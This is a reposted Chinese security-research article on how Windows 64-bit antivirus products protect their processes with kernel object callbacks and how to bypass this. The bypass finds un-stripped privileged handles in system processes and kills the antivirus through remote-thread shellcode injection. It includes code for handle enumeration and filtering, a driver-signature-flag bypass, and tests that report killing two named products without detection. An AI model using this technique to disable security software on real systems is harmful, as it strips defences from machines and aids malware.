windows环境下的自保护探究

admin 2022年5月18日19:17:31安全文章评论15 views17408字阅读58分1秒阅读模式

点击 / 关注我们


0x00 前言

我们要想在32位下实现进程保护很简单,通过SSDT hook重写函数即可实现,但是在64位系统下因为引入了PGDSE的原因,导致SSDT hook实现起来处处受限。但微软同样为了系统安全,增加了一个对象回调函数的接口,利用该回调可以实现对对象请求的过滤保护自身的进程,目前大部分64位下的安全软件保护机制都是基于该方法,我们深入进行探究

0x01 驱动保护

其实在最开始研究的时候我的思路是通过研究游戏这一块的保护来进行延申,说到游戏保护这块做得比较好的就是鹅厂的tp了

在经过搜索引擎的洗礼之后,我发现tp是通过hypervisor进行驱动保护,但是这里细节十分复杂,对我这种小白十分不友好,简略来说就是接管内核里面常见的读写API来阻止读写

在研究的过程中,我又发现了另外一种驱动保护的方法:剥离句柄回调

我们在前面提到过微软为了安全性的考虑在64位下面不允许我们去动内核里面的代码了,而是通过回调函数的机制来进行操作,比如说要实现进程的监控就注册PsSetCreateProcessNotifyRoutineEx的回调,如果想要实现模块的监控就注册PsSetLoadImageNotifyRoutine的回调

那么如果想要进行调试,必须用到的一个API就是OpenProcess,最终在内核调用的函数就是NtOpenProcess,而NtOpenProcess会触发ObRegisterCallbacks这个回调函数。那么只要能够捕获ObRegisterCallbacks发送的这些回调信息,将一些敏感的剥离,就能够达到防止进程读写的效果

那么我们去msdn里面找一下ObRegisterCallbacks这个函数

NTSTATUS ObRegisterCallbacks (
  _In_  POB_CALLBACK_REGISTRATION CallBackRegistration,
  _Out_ PVOID                     *RegistrationHandle
);

windows环境下的自保护探究
image-20220430161205580.png


第一个参数 CallBackRegistration是个指向 OB_CALLBACK_REGISTRATION类型的结构体的指针。当 ObRegisterCallbacks例程注册 ObjectPreCallback或 ObjectPostCallback回调例程时这个结构体指定回调例程和其他注册信息的的列表,结构如下

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

第五个成员 OperationRegistration比较关键,这是个指向 OB_OPERATION_REGISTRATION类型结构体数组的指针。每个 OB_OPERATION_REGISTRATION结构体指定 ObjectPreCallback和 ObjectPostCallback回调例程以及那些例程被调用的操作类型,结构如下

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

在这里需要注意的是第三个成员 PreOperation。这是个指向 ObjectPreCallback例程的指针,系统会在请求的操作发生之前调用这个例程,通过这个 ObjectPreCallback例程来达到我们的目的

OB_PREOP_CALLBACK_STATUS ObjectPreCallback (
  _In_ PVOID                         RegistrationContext,
  _In_ POB_PRE_OPERATION_INFORMATION OperationInformation
);

这里延伸一下,如果想要使用ObRegisterCallbacks,windows会首先通过MmVerifyCallbackFunction这个函数去实现强制完整性检查

强制完整性检查是一种确保正在加载的二进制文件在加载前需要使用签名的策略,IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY标志在链接时通过使用/integritycheck链接器标志在PE头中进行设置,让正在加载的二进制文件必须签名,这个标志使windows内存管理器在加载时对二进制文件进行签名检查

那么微软就是通过加载二进制文件时是否存在标志来确认驱动的发布者身份是否为已知状态,这就是强制完整性检查

我在IDA里面逆了一下MmVerifyCallbackFunction这个函数,发现其逻辑就是通过比较[rax+68h]是否包含了0x20来判断是否拥有正确的数字签名

windows环境下的自保护探究
image-20220430162029355.png


这里的rax表示DriverSection,而DriverSection指向的是_LDR_DATA_TABLE_ENTRY结构,那么[rax + 0x68]指向的就是ProcessStaticImport

windows环境下的自保护探究
image-20220430162109373.png


那么如果我们要使用ObRegisterCallbacks这个函数就需要拥有数字签名,这里我们就可以将DriverObject->DriverSection->Flags的值与0x20按位或即可

在64位系统里面一些杀软的自保护都是通过设置OBOperationRegistration这个回调函数实现,关键代码如下

VOID InstallCallBacks()
{
    NTSTATUS NtHandleCallback = STATUS_UNSUCCESSFUL;
    NTSTATUS NtThreadCallback = STATUS_UNSUCCESSFUL;
    OB_OPERATION_REGISTRATION OBOperationRegistration[2];
    OB_CALLBACK_REGISTRATION OBOCallbackRegistration;
    REG_CONTEXT regContext;
    UNICODE_STRING usAltitude;
    memset(&OBOperationRegistration, 0, sizeof(OB_OPERATION_REGISTRATION));
    memset(&OBOCallbackRegistration, 0, sizeof(OB_CALLBACK_REGISTRATION));
    memset(&regContext, 0, sizeof(REG_CONTEXT));
    regContext.ulIndex = 1;
    regContext.Version = 120;
    RtlInitUnicodeString(&usAltitude, L"1000");
    if ((USHORT)ObGetFilterVersion() == OB_FLT_REGISTRATION_VERSION)
    {


        OBOperationRegistration[1].ObjectType = PsProcessType;
        OBOperationRegistration[1].Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE;
        OBOperationRegistration[1].PreOperation = ProcessHandleCallbacks;
        OBOperationRegistration[1].PostOperation = HandleAfterCreat;
        OBOperationRegistration[0].ObjectType = PsThreadType;
        OBOperationRegistration[0].Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE;
        OBOperationRegistration[0].PreOperation = ThreadHandleCallbacks;
        OBOperationRegistration[0].PostOperation = HandleAfterCreat;
        OBOCallbackRegistration.Version = OB_FLT_REGISTRATION_VERSION;
        OBOCallbackRegistration.OperationRegistrationCount = 2;
        OBOCallbackRegistration.RegistrationContext = &regContext;
        OBOCallbackRegistration.OperationRegistration = OBOperationRegistration;
        NtHandleCallback = ObRegisterCallbacks(&OBOCallbackRegistration, &g_CallbacksHandle); // Register The CallBack
        if (!NT_SUCCESS(NtHandleCallback))
        {
            if (g_CallbacksHandle)
            {
                ObUnRegisterCallbacks(g_CallbacksHandle);
                g_CallbacksHandle = NULL;
            }
            DebugPrint("[DebugMessage] Failed to install ObRegisterCallbacks: 0x%08X.n", NtHandleCallback);
        }
        else
            DebugPrint("[DebugMessage] Success: ObRegisterCallbacks Was Be Installn");
    }
    PsSetCreateProcessNotifyRoutine(CreateProcessNotify, FALSE);
}

回调函数如下

OB_PREOP_CALLBACK_STATUS ProcessHandleCallbacks(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION OperationInformation)
{
    UNREFERENCED_PARAMETER(RegistrationContext);
    if (g_MyPorcess == -1)
        return OB_PREOP_SUCCESS;
    if (OperationInformation->KernelHandle)
        return OB_PREOP_SUCCESS;
    PEPROCESS ProtectedProcessPEPROCESS;
    PEPROCESS ProtectedUserModeACPEPROCESS;
    PEPROCESS OpenedProcess = (PEPROCESS)OperationInformation->Object, CurrentProcess = PsGetCurrentProcess();
    ULONG ulProcessId = (ULONG)PsGetProcessId(OpenedProcess);
    ULONG myProcessId = (ULONG)PsGetProcessId(CurrentProcess);

    if (ulProcessId == g_MyPorcess) //如果进程我们的进程
    {
        if (OperationInformation->Operation == OB_OPERATION_HANDLE_CREATE) // 句柄降权
        {
            if ((OperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_TERMINATE) == PROCESS_TERMINATE)
            {
                //移除杀死进程的权限
                OperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_TERMINATE;
            }
            if ((OperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_VM_OPERATION) == PROCESS_VM_OPERATION)
            {
                OperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_VM_OPERATION;
            }
            if ((OperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_VM_READ) == PROCESS_VM_READ)
            {
                OperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_VM_READ;
            }
            if ((OperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_VM_WRITE) == PROCESS_VM_WRITE)
            {
                OperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_VM_WRITE;
            }

        }
    }

    return OB_PREOP_SUCCESS;

仔细阅读源码后发现,如果我们尝试使用OpenProcess打开杀软进程,杀软就会触发OperationRegistration这个回调对句柄进行降权操作,把拥有R/W/OP权限的句柄都进行了剥离,那么如果我们想要使用TerminateProcessWriteProcessMemoryReadProcessMemory这些需要用到句柄的函数kill掉杀软权限是不够的,那么这样就是实现了自保护

0x02 深入探究

通过OBOperationRegistration将句柄降权基本上把要使用句柄进程读写的函数限制得很死了,但是某些系统的进程(如svchost.exelsass.execsrss.exe等)却可能拥有高权限的句柄

例如这里定位到火绒的模块,搜索关键字符串Hips,可以看到在csrss.exeservices.exelsass.exesvchost.exe都存在火绒的句柄

windows环境下的自保护探究
image-20220430191621849.png


我们去看lsass.exe进程里面的句柄,这里是有完整的权限的

windows环境下的自保护探究
image-20220430191629676.png


这里的话我们就可以衍生出一种思路,我们通过遍历所有的句柄,然后进行判断这个句柄是否被降权,如果没有被降权,那么我们就可以使用这个句柄去kill掉杀软

那么这里我们该如何获得所有的句柄呢?我们知道windows为了安全,在3环是不能够直接去操作内核内存的,而是通过给3环一个句柄,然后再返回给0环,那么0环在拿到句柄之后,会去内核空间里面找句柄表,通过返回的句柄编号去对应句柄表,然后再通过句柄表里面存放的真实地址来对内核空间进行操作,windows这样设计是为了防止直接修改内核代码导致操作系统蓝屏,我们又该如何获得句柄表的所有地址呢?

这里就需要用到一个API:ZwQuerySystemInformation

NTSTATUS WINAPI ZwQuerySystemInformation(
  __in          SYSTEM_INFORMATION_CLASSSystemInformationClass,
  __in_out     PVOIDSystemInformation,
  __in          ULONGSystemInformationLength,
  __out_opt    PULONGReturnLength
);

这个函数在用户模式下和内核模式下都可以使用,在内核里面可以直接使用,在用户层则需要通过ntdll.dll寻址。因为这个API是未文档化的函数,所以这里我们就需要通过自己去分析结构,这里第一个参数指向_SYSTEM_INFORMATION_CLASS结构,这里我们要获取句柄表,就需要用到16号即SystemHandleInformation

typedef enum _SYSTEM_INFORMATION_CLASS     //    Q S
{
    SystemBasicInformation,                // 00 Y N
    SystemProcessorInformation,            // 01 Y N
    SystemPerformanceInformation,          // 02 Y N
    SystemTimeOfDayInformation,            // 03 Y N
    SystemNotImplemented1,                 // 04 Y N
    SystemProcessesAndThreadsInformation,  // 05 Y N
    SystemCallCounts,                      // 06 Y N
    SystemConfigurationInformation,        // 07 Y N
    SystemProcessorTimes,                  // 08 Y N
    SystemGlobalFlag,                      // 09 Y Y
    SystemNotImplemented2,                 // 10 Y N
    SystemModuleInformation,               // 11 Y N
    SystemLockInformation,                 // 12 Y N
    SystemNotImplemented3,                 // 13 Y N
    SystemNotImplemented4,                 // 14 Y N
    SystemNotImplemented5,                 // 15 Y N
    SystemHandleInformation,               // 16 Y N
    SystemObjectInformation,               // 17 Y N
    SystemPagefileInformation,             // 18 Y N
    SystemInstructionEmulationCounts,      // 19 Y N
    SystemInvalidInfoClass1,               // 20
    SystemCacheInformation,                // 21 Y Y
    SystemPoolTagInformation,              // 22 Y N
    SystemProcessorStatistics,             // 23 Y N
    SystemDpcInformation,                  // 24 Y Y
    SystemNotImplemented6,                 // 25 Y N
    SystemLoadImage,                       // 26 N Y
    SystemUnloadImage,                     // 27 N Y
    SystemTimeAdjustment,                  // 28 Y Y
    SystemNotImplemented7,                 // 29 Y N
    SystemNotImplemented8,                 // 30 Y N
    SystemNotImplemented9,                 // 31 Y N
    SystemCrashDumpInformation,            // 32 Y N
    SystemExceptionInformation,            // 33 Y N
    SystemCrashDumpStateInformation,       // 34 Y Y/N
    SystemKernelDebuggerInformation,       // 35 Y N
    SystemContextSwitchInformation,        // 36 Y N
    SystemRegistryQuotaInformation,        // 37 Y Y
    SystemLoadAndCallImage,                // 38 N Y
    SystemPrioritySeparation,              // 39 N Y
    SystemNotImplemented10,                // 40 Y N
    SystemNotImplemented11,                // 41 Y N
    SystemInvalidInfoClass2,               // 42
    SystemInvalidInfoClass3,               // 43
    SystemTimeZoneInformation,             // 44 Y N
    SystemLookasideInformation,            // 45 Y N
    SystemSetTimeSlipEvent,                // 46 N Y
    SystemCreateSession,                   // 47 N Y
    SystemDeleteSession,                   // 48 N Y
    SystemInvalidInfoClass4,               // 49
    SystemRangeStartInformation,           // 50 Y N
    SystemVerifierInformation,             // 51 Y Y
    SystemAddVerifier,                     // 52 N Y
    SystemSessionProcessesInformation      // 53 Y N
} SYSTEM_INFORMATION_CLASS;

每一个enum元素对应着查询信息,而 SystemHandleInformation(0x10)查询的是 SYSTEM_HANDLE_INFORMATIO结构体指针的信息,我们看一下结构

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG            ProcessId;    //进程ID
    UCHAR            ObjectTypeNumber;  //打开的对象的类型
    UCHAR            Flags; //句柄属性标志
    USHORT            Handle;    //句柄
    PVOID            Object;    //句柄对象
    ACCESS_MASK        GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;    //数组数量
    SYSTEM_HANDLE Information[1];    //数组指针
}SYSTEM_HANDLE_INFORMATIO, *PSYSTEM_HANDLE_INFORMATION;

那么这里我们拿到所有的句柄之后要进行判断,是不是我们需要用到的句柄,这里又需要用到NtQueryObject这个API,也在ntdll.dll里面寻址

__kernel_entry NTSYSCALLAPI NTSTATUS NtQueryObject(
  [in, optional]  HANDLE                   Handle,
  [in]            OBJECT_INFORMATION_CLASS ObjectInformationClass,
  [out, optional] PVOID                    ObjectInformation,
  [in]            ULONG                    ObjectInformationLength,
  [out, optional] PULONG                   ReturnLength
);

NtQueryObject函数用来查询对象句柄信息,当 OBJECT_INFORMATION_CLASS参数为ObjectNameInformation(1)ObjectTypeInformation(2)时分别查询句柄的名称和句柄类型 它们的定义和查询的结构体如下:

typedef enum _OBJECT_INFORMATION_CLASS {
    ObjectBasicInformation,
    ObjectNameInformation,
    ObjectTypeInformation,
    ObjectAllInformation,
    ObjectDataInformation
} OBJECT_INFORMATION_CLASS, *POBJECT_INFORMATION_CLASS;
//注释
//ObjectBasicInformation 对应结构为:OBJECT_BASIC_INFORMATION
//ObjectNameInformation 对应结构为:OBJECT_NAME_INFORMATION
//ObjectTypeInformation  对应结构为:OBJECT_TYPE_INFORMATION
//ObjectAllInformation  对应结构为:   OBJECT_ALL_INFORMATION
//ObjectDataInformation对应结构为:  OBJECT_DATA_INFORMATION

typedef struct
{
    USHORT Length;    //当前名称长度
    USHORT MaxLen;    //缓冲区最大长度
    USHORT *Buffer;    //Unicode 名称指针
}UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_NAME_INFORMATION {
    UNICODE_STRING          Name;
    WCHAR                   NameBuffer[0];
} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;

typedef struct _OBJECT_TYPE_INFORMATION {
    UNICODE_STRING          TypeName;
    ULONG                   TotalNumberOfHandles;
    ULONG                   TotalNumberOfObjects;
    WCHAR                   Unused1[8];
    ULONG                   HighWaterNumberOfHandles;
    ULONG                   HighWaterNumberOfObjects;
    WCHAR                   Unused2[8];
    ACCESS_MASK             InvalidAttributes;
    GENERIC_MAPPING         GenericMapping;
    ACCESS_MASK             ValidAttributes;
    BOOLEAN                 SecurityRequired;
    BOOLEAN                 MaintainHandleCount;
    USHORT                  MaintainTypeList;
    POOL_TYPE               PoolType;
    ULONG                   DefaultPagedPoolCharge;
    ULONG                   DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;

那么我们首先对这几个未文档化的API进行初始化

BOOL InitUnDocumentProc()
{
    HMODULE hNtdll = GetModuleHandle("Ntdll.dll");
    if( hNtdll == NULL )    
        return FALSE;

    ZwQuerySystemInformation = 
        (pfnNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    ZwQueryObject = 
        (pfnNtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    ZwQueryInformationProcess = 
        (pfnNtQueryInformationProcess)GetProcAddress(hNtdll, "NtQueryInformationProcess");

    if( (ZwQuerySystemInformation == NULL) || 
        (ZwQueryObject == NULL) || 
        (ZwQueryInformationProcess == NULL) )
        return FALSE;
    return TRUE;
}

然后就可以编写函数进行查询

PSYSTEM_HANDLE_INFORMATION_EX GetSystemProcessHandleInfo()
{
    DWORD buffLen = 0x1000;
    NTSTATUS status;
    BYTE* buff = new BYTE[buffLen];
    do{
        status = ZwQuerySystemInformation(SystemHandleInformation, buff, buffLen, &buffLen);
        if( status == STATUS_INFO_LENGTH_MISMATCH )
        {
            delete[] buff;
            buff = new BYTE[buffLen];
        } else
            break;

    } while( TRUE );
    return (PSYSTEM_HANDLE_INFORMATION_EX)buff;
}

然后通过查询到的信息定位到EPROCESS结构

DWORD64 GetTarEPROCESS() 
{
    HANDLE TarHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, g_ProcessID);
    PSYSTEM_HANDLE_INFORMATION_EX HandleInfo = GetSystemProcessHandleInfo();
    DWORD64 EPROCESS;
    for (int i = 0; i < HandleInfo->NumberOfHandles; i++)
    {
        if (HandleInfo->Information[i].Handle == (USHORT)TarHandle && HandleInfo->Information[i].ProcessId == GetCurrentProcessId())
        {
            EPROCESS = (DWORD64)HandleInfo->Information[i].Object;
            break;
        }
    }
    free(HandleInfo);
    CloseHandle(TarHandle);
    return EPROCESS;

我们再进行循环遍历,这里句柄类型为7的时候对应的是PROCESS类句柄

windows环境下的自保护探究
image-20220430202904077.png


PSYSTEM_HANDLE_INFORMATION_EX HandleInfo = GetSystemProcessHandleInfo();
    for (int i = 0; i < HandleInfo->NumberOfHandles; i++)
    {
        if (HandleInfo->Information[i].ObjectTypeNumber == 7)

然后进行权限、类别的判断和过滤

if((DWORD64)HandleInfo->Information[i].Object != EPROCESS)
    continue;
//排除掉目标进程的PID
if (HandleInfo->Information[i].ProcessId == g_ProcessID)
    continue;
if ((HandleInfo->Information[i].GrantedAccess & PROCESS_VM_READ) != PROCESS_VM_READ)
    continue;
if ((HandleInfo->Information[i].GrantedAccess & PROCESS_VM_OPERATION) != PROCESS_VM_OPERATION)
    continue;
if ((HandleInfo->Information[i].GrantedAccess & PROCESS_QUERY_INFORMATION) != PROCESS_QUERY_INFORMATION)
    continue;

如果一系列判断都满足那么我们就通过OpenProcess打开进程拿到一个拥有所有权限的句柄

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, HandleInfo->Information[i].ProcessId);
if (!hProcess || hProcess == INVALID_HANDLE_VALUE)
    continue;

这里我们相当于找到了一个有权限的句柄和对应进程的PID,那么我们就可以进行关闭杀软的操作,这里我们就使用OpenProcess获取一个新的句柄,通过注入shellcode的方式来kill进程,使用CreateRemoteThread进行常规的远程线程注入即可

0x03 测试

这里我选择了3款国产杀软进行测试

windows环境下的自保护探究
image-20220430210553907.png


首先是某60安全卫士

windows环境下的自保护探究
image-20220430212548315.png


扫描一下是没有报毒的

windows环境下的自保护探究
image-20220430212654427.png

windows环境下的自保护探究
image-20220430212714600.png


这里执行发现报错WriteProcessMemory failed : 5,那么证明这里某60不允许句柄有写入权限

windows环境下的自保护探究
image-20220430213231718.png


我们再有请下一位受害者某绒

windows环境下的自保护探究
image-20220430210632653.png


这里扫一下同样是没有报毒

windows环境下的自保护探究
image-20220430212225494.png

windows环境下的自保护探究
image-20220430212300670.png


然后执行程序关闭某绒成功,这里有几个句柄CreateRemoteThread失败是因为申请的空间不够

windows环境下的自保护探究
image-20220430211716189.png


最后一位受害者是某电脑管家

windows环境下的自保护探究
image-20220430211454427.png


同样扫描一下没有报毒

windows环境下的自保护探究
image-20220430212100137.png

windows环境下的自保护探究
image-20220430212119251.png


然后这里执行程序成功kill

windows环境下的自保护探究
image-20220430211656139.png


可以看到可利用的句柄是位于csrss.exe里面

windows环境下的自保护探究
image-20220430211840714.pn



推荐阅读:
CodeQL能找到log4shell(CVE-2021-44228)漏洞吗?
浅谈hook攻防
HOW DO YOU ACTUALLY FIND BUGS?(译文)
对抗无落地的shellcode注入
渗透测试工具 OWASP ZAP 的 RCE 反制




跳跳糖是一个安全社区,旨在为安全人员提供一个能让思维跳跃起来的交流平台。
跳跳糖持续向广大安全从业者征集高质量技术文章,可以是漏洞分析,事件分析,渗透技巧,安全工具等等。
通过审核且发布将予以500RMB-1000RMB不等的奖励,具体文章要求可以查看“投稿须知”。

阅读更多原创技术文章,戳“阅读全文

原文始发于微信公众号(跳跳糖社区):windows环境下的自保护探究

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月18日19:17:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  windows环境下的自保护探究 http://cn-sec.com/archives/1017602.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: